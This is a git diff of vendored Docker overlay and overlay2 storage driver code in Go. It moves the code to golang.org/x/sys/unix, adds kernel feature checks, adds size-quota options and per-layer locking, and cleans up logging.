diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
index 34b6d801fd..b270122c63 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package overlay
+package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
index 3dbb4de44e..8fc06ffecf 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
@@ -1,3 +1,3 @@
 // +build !linux
 
-package overlay
+package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay"
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
index 53a7199292..d6ee42f47f 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
 
 import (
 	"fmt"
@@ -10,29 +10,34 @@ import (
 	"path/filepath"
 	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/system"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
-// hasOpaqueCopyUpBug checks whether the filesystem has a bug
+// doesSupportNativeDiff checks whether the filesystem has a bug
 // which copies up the opaque flag when copying up an opaque
-// directory. When this bug exists naive diff should be used.
-func hasOpaqueCopyUpBug(d string) error {
+// directory or the kernel enable CONFIG_OVERLAY_FS_REDIRECT_DIR.
+// When these exist naive diff should be used.
+func doesSupportNativeDiff(d string) error {
 	td, err := ioutil.TempDir(d, "opaque-bug-check")
 	if err != nil {
 		return err
 	}
 	defer func() {
 		if err := os.RemoveAll(td); err != nil {
-			logrus.Warnf("Failed to remove check directory %v: %v", td, err)
+			logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err)
 		}
 	}()
 
-	// Make directories l1/d, l2/d, l3, work, merged
+	// Make directories l1/d, l1/d1, l2/d, l3, work, merged
 	if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil {
 		return err
 	}
+	if err := os.MkdirAll(filepath.Join(td, "l1", "d1"), 0755); err != nil {
+		return err
+	}
 	if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil {
 		return err
 	}
@@ -52,12 +57,12 @@ func hasOpaqueCopyUpBug(d string) error {
 	}
 
 	opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work"))
-	if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil {
+	if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil {
 		return errors.Wrap(err, "failed to mount overlay")
 	}
 	defer func() {
-		if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil {
-			logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err)
+		if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != nil {
+			logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err)
 		}
 	}()
 
@@ -75,5 +80,55 @@ func hasOpaqueCopyUpBug(d string) error {
 		return errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix")
 	}
 
+	// rename "d1" to "d2"
+	if err := os.Rename(filepath.Join(td, "merged", "d1"), filepath.Join(td, "merged", "d2")); err != nil {
+		// if rename failed with syscall.EXDEV, the kernel doesn't have CONFIG_OVERLAY_FS_REDIRECT_DIR enabled
+		if err.(*os.LinkError).Err == syscall.EXDEV {
+			return nil
+		}
+		return errors.Wrap(err, "failed to rename dir in merged directory")
+	}
+	// get the xattr of "d2"
+	xattrRedirect, err := system.Lgetxattr(filepath.Join(td, "l3", "d2"), "trusted.overlay.redirect")
+	if err != nil {
+		return errors.Wrap(err, "failed to read redirect flag on upper layer")
+	}
+
+	if string(xattrRedirect) == "d1" {
+		return errors.New("kernel has CONFIG_OVERLAY_FS_REDIRECT_DIR enabled")
+	}
+
+	return nil
+}
+
+// supportsMultipleLowerDir checks if the system supports multiple lowerdirs,
+// which is required for the overlay2 driver. On 4.x kernels, multiple lowerdirs
+// are always available (so this check isn't needed), and backported to RHEL and
+// CentOS 3.x kernels (3.10.0-693.el7.x86_64 and up). This function is to detect
+// support on those kernels, without doing a kernel version compare.
+func supportsMultipleLowerDir(d string) error {
+	td, err := ioutil.TempDir(d, "multiple-lowerdir-check")
+	if err != nil {
+		return err
+	}
+	defer func() {
+		if err := os.RemoveAll(td); err != nil {
+			logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err)
+		}
+	}()
+
+	for _, dir := range []string{"lower1", "lower2", "upper", "work", "merged"} {
+		if err := os.Mkdir(filepath.Join(td, dir), 0755); err != nil {
+			return err
+		}
+	}
+
+	opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "lower2"), path.Join(td, "lower1"), path.Join(td, "upper"), path.Join(td, "work"))
+	if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil {
+		return errors.Wrap(err, "failed to mount overlay")
+	}
+	if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != nil {
+		logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err)
+	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
index 60e248b6d7..da409fc81a 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
 
 import (
 	"bytes"
@@ -9,9 +9,9 @@ import (
 	"fmt"
 	"os"
 	"runtime"
-	"syscall"
 
 	"github.com/docker/docker/pkg/reexec"
+	"golang.org/x/sys/unix"
 )
 
 func init() {
@@ -49,18 +49,19 @@ func mountFrom(dir, device, target, mType string, flags uintptr, label string) e
 	output := bytes.NewBuffer(nil)
 	cmd.Stdout = output
 	cmd.Stderr = output
-
 	if err := cmd.Start(); err != nil {
+		w.Close()
 		return fmt.Errorf("mountfrom error on re-exec cmd: %v", err)
 	}
 	//write the options to the pipe for the untar exec to read
 	if err := json.NewEncoder(w).Encode(options); err != nil {
+		w.Close()
 		return fmt.Errorf("mountfrom json encode to pipe failed: %v", err)
 	}
 	w.Close()
 
 	if err := cmd.Wait(); err != nil {
-		return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output)
+		return fmt.Errorf("mountfrom re-exec error: %v: output: %v", err, output)
 	}
 	return nil
 }
@@ -80,7 +81,7 @@ func mountFromMain() {
 		fatal(err)
 	}
 
-	if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil {
+	if err := unix.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil {
 		fatal(err)
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
index 65ac6bfaeb..5108a2c055 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
@@ -1,9 +1,10 @@
 // +build linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
 
 import (
 	"bufio"
+	"context"
 	"errors"
 	"fmt"
 	"io"
@@ -15,24 +16,26 @@ import (
 	"strconv"
 	"strings"
 	"sync"
-	"syscall"
-
-	"github.com/Sirupsen/logrus"
 
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/daemon/graphdriver/overlayutils"
 	"github.com/docker/docker/daemon/graphdriver/quota"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/directory"
 	"github.com/docker/docker/pkg/fsutils"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/locker"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
 	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/go-units"
-
-	"github.com/opencontainers/runc/libcontainer/label"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 var (
@@ -74,7 +77,7 @@ const (
 	maxDepth   = 128
 
 	// idLength represents the number of random characters
-	// which can be used to create the unique link identifer
+	// which can be used to create the unique link identifier
 	// for every layer. If this value is too long then the
 	// page size limit for the mount command may be exceeded.
 	// The idLength should be selected such that following equation
@@ -88,7 +91,8 @@ type overlayOptions struct {
 	quota               quota.Quota
 }
 
-// Driver contains information about the home directory and the list of active mounts that are created using this driver.
+// Driver contains information about the home directory and the list of active
+// mounts that are created using this driver.
 type Driver struct {
 	home          string
 	uidMaps       []idtools.IDMap
@@ -98,6 +102,7 @@ type Driver struct {
 	options       overlayOptions
 	naiveDiff     graphdriver.DiffDriver
 	supportsDType bool
+	locker        *locker.Locker
 }
 
 var (
@@ -112,9 +117,11 @@ func init() {
 	graphdriver.Register(driverName, Init)
 }
 
-// Init returns the a native diff driver for overlay filesystem.
-// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error.
-// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned.
+// Init returns the native diff driver for overlay filesystem.
+// If overlay filesystem is not supported on the host, the error
+// graphdriver.ErrNotSupported is returned.
+// If an overlay filesystem is not supported over an existing filesystem then
+// the error graphdriver.ErrIncompatibleFS is returned.
 func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
 	opts, err := parseOptions(options)
 	if err != nil {
@@ -130,14 +137,17 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 	if err != nil {
 		return nil, err
 	}
-	if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 {
-		if !opts.overrideKernelCheck {
-			return nil, graphdriver.ErrNotSupported
-		}
-		logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update")
+
+	// Perform feature detection on /var/lib/docker/overlay2 if it's an existing directory.
+	// This covers situations where /var/lib/docker/overlay2 is a mount, and on a different
+	// filesystem than /var/lib/docker.
+	// If the path does not exist, fall back to using /var/lib/docker for feature detection.
+	testdir := home
+	if _, err := os.Stat(testdir); os.IsNotExist(err) {
+		testdir = filepath.Dir(testdir)
 	}
 
-	fsMagic, err := graphdriver.GetFSMagic(home)
+	fsMagic, err := graphdriver.GetFSMagic(testdir)
 	if err != nil {
 		return nil, err
 	}
@@ -145,33 +155,53 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		backingFs = fsName
 	}
 
-	// check if they are running over btrfs, aufs, zfs, overlay, or ecryptfs
+	logger := logrus.WithField("storage-driver", "overlay2")
+
 	switch fsMagic {
-	case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs:
-		logrus.Errorf("'overlay2' is not supported over %s", backingFs)
+	case graphdriver.FsMagicAufs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs:
+		logger.Errorf("'overlay2' is not supported over %s", backingFs)
 		return nil, graphdriver.ErrIncompatibleFS
+	case graphdriver.FsMagicBtrfs:
+		// Support for OverlayFS on BTRFS was added in kernel 4.7
+		// See https://btrfs.wiki.kernel.org/index.php/Changelog
+		if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 7, Minor: 0}) < 0 {
+			if !opts.overrideKernelCheck {
+				logger.Errorf("'overlay2' requires kernel 4.7 to use on %s", backingFs)
+				return nil, graphdriver.ErrIncompatibleFS
+			}
+			logger.Warn("Using pre-4.7.0 kernel for overlay2 on btrfs, may require kernel update")
+		}
 	}
 
-	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
-	if err != nil {
-		return nil, err
+	if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 {
+		if opts.overrideKernelCheck {
+			logger.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update")
+		} else {
+			if err := supportsMultipleLowerDir(testdir); err != nil {
+				logger.Debugf("Multiple lower dirs not supported: %v", err)
+				return nil, graphdriver.ErrNotSupported
+			}
+		}
 	}
-	// Create the driver home dir
-	if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
+	supportsDType, err := fsutils.SupportsDType(testdir)
+	if err != nil {
 		return nil, err
 	}
-
-	if err := mount.MakePrivate(home); err != nil {
-		return nil, err
+	if !supportsDType {
+		if !graphdriver.IsInitialized(home) {
+			return nil, overlayutils.ErrDTypeNotSupported("overlay2", backingFs)
+		}
+		// allow running without d_type only for existing setups (#27443)
+		logger.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs))
 	}
 
-	supportsDType, err := fsutils.SupportsDType(home)
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
 	if err != nil {
 		return nil, err
 	}
-	if !supportsDType {
-		// not a fatal error until v1.16 (#27443)
-		logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs))
+	// Create the driver home dir
+	if err := idtools.MkdirAllAndChown(path.Join(home, linkDir), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+		return nil, err
 	}
 
 	d := &Driver{
@@ -180,6 +210,8 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		gidMaps:       gidMaps,
 		ctr:           graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)),
 		supportsDType: supportsDType,
+		locker:        locker.New(),
+		options:       *opts,
 	}
 
 	d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps)
@@ -188,10 +220,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		// Try to enable project quota support over xfs.
 		if d.quotaCtl, err = quota.NewControl(home); err == nil {
 			projectQuotaSupported = true
+		} else if opts.quota.Size > 0 {
+			return nil, fmt.Errorf("Storage option overlay2.size not supported. Filesystem does not support Project Quota: %v", err)
 		}
+	} else if opts.quota.Size > 0 {
+		// if xfs is not the backing fs then error out if the storage-opt overlay2.size is used.
+		return nil, fmt.Errorf("Storage Option overlay2.size only supported for backingFS XFS. Found %v", backingFs)
 	}
 
-	logrus.Debugf("backingFs=%s,  projectQuotaSupported=%v", backingFs, projectQuotaSupported)
+	logger.Debugf("backingFs=%s,  projectQuotaSupported=%v", backingFs, projectQuotaSupported)
 
 	return d, nil
 }
@@ -210,9 +247,14 @@ func parseOptions(options []string) (*overlayOptions, error) {
 			if err != nil {
 				return nil, err
 			}
-
+		case "overlay2.size":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			o.quota.Size = uint64(size)
 		default:
-			return nil, fmt.Errorf("overlay2: Unknown option %s\n", key)
+			return nil, fmt.Errorf("overlay2: unknown option %s", key)
 		}
 	}
 	return o, nil
@@ -235,14 +277,14 @@ func supportsOverlay() error {
 			return nil
 		}
 	}
-	logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
+	logrus.WithField("storage-driver", "overlay2").Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
 	return graphdriver.ErrNotSupported
 }
 
 func useNaiveDiff(home string) bool {
 	useNaiveDiffLock.Do(func() {
-		if err := hasOpaqueCopyUpBug(home); err != nil {
-			logrus.Warnf("Not using native diff for overlay2: %v", err)
+		if err := doesSupportNativeDiff(home); err != nil {
+			logrus.WithField("storage-driver", "overlay2").Warnf("Not using native diff for overlay2, this may cause degraded performance for building images: %v", err)
 			useNaiveDiffOnly = true
 		}
 	})
@@ -263,8 +305,8 @@ func (d *Driver) Status() [][2]string {
 	}
 }
 
-// GetMetadata returns meta data about the overlay driver such as
-// LowerDir, UpperDir, WorkDir and MergeDir used to store data.
+// GetMetadata returns metadata about the overlay driver such as the LowerDir,
+// UpperDir, WorkDir, and MergeDir used to store data.
 func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 	dir := d.dir(id)
 	if _, err := os.Stat(dir); err != nil {
@@ -292,33 +334,56 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 // is being shutdown. For now, we just have to unmount the bind mounted
 // we had created.
 func (d *Driver) Cleanup() error {
-	return mount.Unmount(d.home)
+	return mount.RecursiveUnmount(d.home)
 }
 
 // CreateReadWrite creates a layer that is writable for use as a container
 // file system.
 func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
-	return d.Create(id, parent, opts)
+	if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported {
+		return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option")
+	}
+
+	if opts == nil {
+		opts = &graphdriver.CreateOpts{
+			StorageOpt: map[string]string{},
+		}
+	}
+
+	if _, ok := opts.StorageOpt["size"]; !ok {
+		if opts.StorageOpt == nil {
+			opts.StorageOpt = map[string]string{}
+		}
+		opts.StorageOpt["size"] = strconv.FormatUint(d.options.quota.Size, 10)
+	}
+
+	return d.create(id, parent, opts)
 }
 
 // Create is used to create the upper, lower, and merge directories required for overlay fs for a given id.
 // The parent filesystem is used to configure these directories for the overlay.
 func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) {
-
-	if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported {
-		return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option")
+	if opts != nil && len(opts.StorageOpt) != 0 {
+		if _, ok := opts.StorageOpt["size"]; ok {
+			return fmt.Errorf("--storage-opt size is only supported for ReadWrite Layers")
+		}
 	}
+	return d.create(id, parent, opts)
+}
 
+func (d *Driver) create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) {
 	dir := d.dir(id)
 
 	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
 	if err != nil {
 		return err
 	}
-	if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil {
+	root := idtools.IDPair{UID: rootUID, GID: rootGID}
+
+	if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil {
 		return err
 	}
-	if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(dir, 0700, root); err != nil {
 		return err
 	}
 
@@ -343,7 +408,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 		}
 	}
 
-	if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(path.Join(dir, "diff"), 0755, root); err != nil {
 		return err
 	}
 
@@ -362,10 +427,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr
 		return nil
 	}
 
-	if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
-		return err
-	}
-	if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil {
 		return err
 	}
 
@@ -451,25 +513,34 @@ func (d *Driver) getLowerDirs(id string) ([]string, error) {
 
 // Remove cleans the directories that are created for this id.
 func (d *Driver) Remove(id string) error {
+	if id == "" {
+		return fmt.Errorf("refusing to remove the directories: id is empty")
+	}
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	dir := d.dir(id)
 	lid, err := ioutil.ReadFile(path.Join(dir, "link"))
 	if err == nil {
-		if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil {
-			logrus.Debugf("Failed to remove link: %v", err)
+		if len(lid) == 0 {
+			logrus.WithField("storage-driver", "overlay2").Errorf("refusing to remove empty link for layer %v", id)
+		} else if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil {
+			logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove link: %v", err)
 		}
 	}
 
-	if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) {
+	if err := system.EnsureRemoveAll(dir); err != nil && !os.IsNotExist(err) {
 		return err
 	}
 	return nil
 }
 
 // Get creates and mounts the required file system for the given id and returns the mount path.
-func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
+func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	dir := d.dir(id)
 	if _, err := os.Stat(dir); err != nil {
-		return "", err
+		return nil, err
 	}
 
 	diffDir := path.Join(dir, "diff")
@@ -477,19 +548,25 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
 	if err != nil {
 		// If no lower, just return diff directory
 		if os.IsNotExist(err) {
-			return diffDir, nil
+			return containerfs.NewLocalContainerFS(diffDir), nil
 		}
-		return "", err
+		return nil, err
 	}
 
 	mergedDir := path.Join(dir, "merged")
 	if count := d.ctr.Increment(mergedDir); count > 1 {
-		return mergedDir, nil
+		return containerfs.NewLocalContainerFS(mergedDir), nil
 	}
 	defer func() {
-		if err != nil {
+		if retErr != nil {
 			if c := d.ctr.Decrement(mergedDir); c <= 0 {
-				syscall.Unmount(mergedDir, 0)
+				if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil {
+					logrus.WithField("storage-driver", "overlay2").Errorf("error unmounting %v: %v", mergedDir, mntErr)
+				}
+				// Cleanup the created merged directory; see the comment in Put's rmdir
+				if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) {
+					logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove %s: %v: %v", id, rmErr, err)
+				}
 			}
 		}
 	}()
@@ -502,10 +579,18 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
 	}
 	opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work"))
 	mountData := label.FormatMountLabel(opts, mountLabel)
-	mount := syscall.Mount
+	mount := unix.Mount
 	mountTarget := mergedDir
 
-	pageSize := syscall.Getpagesize()
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+		return nil, err
+	}
+
+	pageSize := unix.Getpagesize()
 
 	// Go can return a larger page size than supported by the system
 	// as of go 1.7. This will be fixed in 1.8 and this block can be
@@ -524,7 +609,7 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
 		opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work"))
 		mountData = label.FormatMountLabel(opts, mountLabel)
 		if len(mountData) > pageSize {
-			return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData))
+			return nil, fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData))
 		}
 
 		mount = func(source string, target string, mType string, flags uintptr, label string) error {
@@ -534,31 +619,51 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
 	}
 
 	if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil {
-		return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
+		return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
 	}
 
 	// chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a
 	// user namespace requires this to move a directory from lower to upper.
-	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
-	if err != nil {
-		return "", err
-	}
-
 	if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil {
-		return "", err
+		return nil, err
 	}
 
-	return mergedDir, nil
+	return containerfs.NewLocalContainerFS(mergedDir), nil
 }
 
 // Put unmounts the mount path created for the give id.
+// It also removes the 'merged' directory to force the kernel to unmount the
+// overlay mount in other namespaces.
 func (d *Driver) Put(id string) error {
-	mountpoint := path.Join(d.dir(id), "merged")
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
+	dir := d.dir(id)
+	_, err := ioutil.ReadFile(path.Join(dir, lowerFile))
+	if err != nil {
+		// If no lower, no mount happened and just return directly
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	mountpoint := path.Join(dir, "merged")
+	logger := logrus.WithField("storage-driver", "overlay2")
 	if count := d.ctr.Decrement(mountpoint); count > 0 {
 		return nil
 	}
-	if err := syscall.Unmount(mountpoint, 0); err != nil {
-		logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err)
+	if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil {
+		logger.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err)
+	}
+	// Remove the mountpoint here. Removing the mountpoint (in newer kernels)
+	// will cause all other instances of this mount in other mount namespaces
+	// to be unmounted. This is necessary to avoid cases where an overlay mount
+	// that is present in another namespace will cause subsequent mounts
+	// operations to fail with ebusy.  We ignore any errors here because this may
+	// fail on older kernels which don't have
+	// torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied.
+	if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) {
+		logger.Debugf("Failed to remove %s overlay: %v", id, err)
 	}
 	return nil
 }
@@ -569,7 +674,8 @@ func (d *Driver) Exists(id string) bool {
 	return err == nil
 }
 
-// isParent returns if the passed in parent is the direct parent of the passed in layer
+// isParent determines whether the given parent is the direct parent of the
+// given layer id
 func (d *Driver) isParent(id, parent string) bool {
 	lowers, err := d.getLowerDirs(id)
 	if err != nil {
@@ -598,17 +704,18 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64
 
 	applyDir := d.getDiffPath(id)
 
-	logrus.Debugf("Applying tar in %s", applyDir)
+	logrus.WithField("storage-driver", "overlay2").Debugf("Applying tar in %s", applyDir)
 	// Overlay doesn't need the parent id to apply the diff
 	if err := untar(diff, applyDir, &archive.TarOptions{
 		UIDMaps:        d.uidMaps,
 		GIDMaps:        d.gidMaps,
 		WhiteoutFormat: archive.OverlayWhiteoutFormat,
+		InUserNS:       rsystem.RunningInUserNS(),
 	}); err != nil {
 		return 0, err
 	}
 
-	return directory.Size(applyDir)
+	return directory.Size(context.TODO(), applyDir)
 }
 
 func (d *Driver) getDiffPath(id string) string {
@@ -624,7 +731,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) {
 	if useNaiveDiff(d.home) || !d.isParent(id, parent) {
 		return d.naiveDiff.DiffSize(id, parent)
 	}
-	return directory.Size(d.getDiffPath(id))
+	return directory.Size(context.TODO(), d.getDiffPath(id))
 }
 
 // Diff produces an archive of the changes between the specified
@@ -635,7 +742,7 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) {
 	}
 
 	diffPath := d.getDiffPath(id)
-	logrus.Debugf("Tar with options on %s", diffPath)
+	logrus.WithField("storage-driver", "overlay2").Debugf("Tar with options on %s", diffPath)
 	return archive.TarWithOptions(diffPath, &archive.TarOptions{
 		Compression:    archive.Uncompressed,
 		UIDMaps:        d.uidMaps,
@@ -644,8 +751,8 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) {
 	})
 }
 
-// Changes produces a list of changes between the specified layer
-// and its parent layer. If parent is "", then all changes will be ADD changes.
+// Changes produces a list of changes between the specified layer and its
+// parent layer. If parent is "", then all changes will be ADD changes.
 func (d *Driver) Changes(id, parent string) ([]archive.Change, error) {
 	if useNaiveDiff(d.home) || !d.isParent(id, parent) {
 		return d.naiveDiff.Changes(id, parent)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
index cf77ff22be..4a07137ed8 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
@@ -1,11 +1,10 @@
 // +build linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
 
 import (
 	"io/ioutil"
 	"os"
-	"syscall"
 	"testing"
 
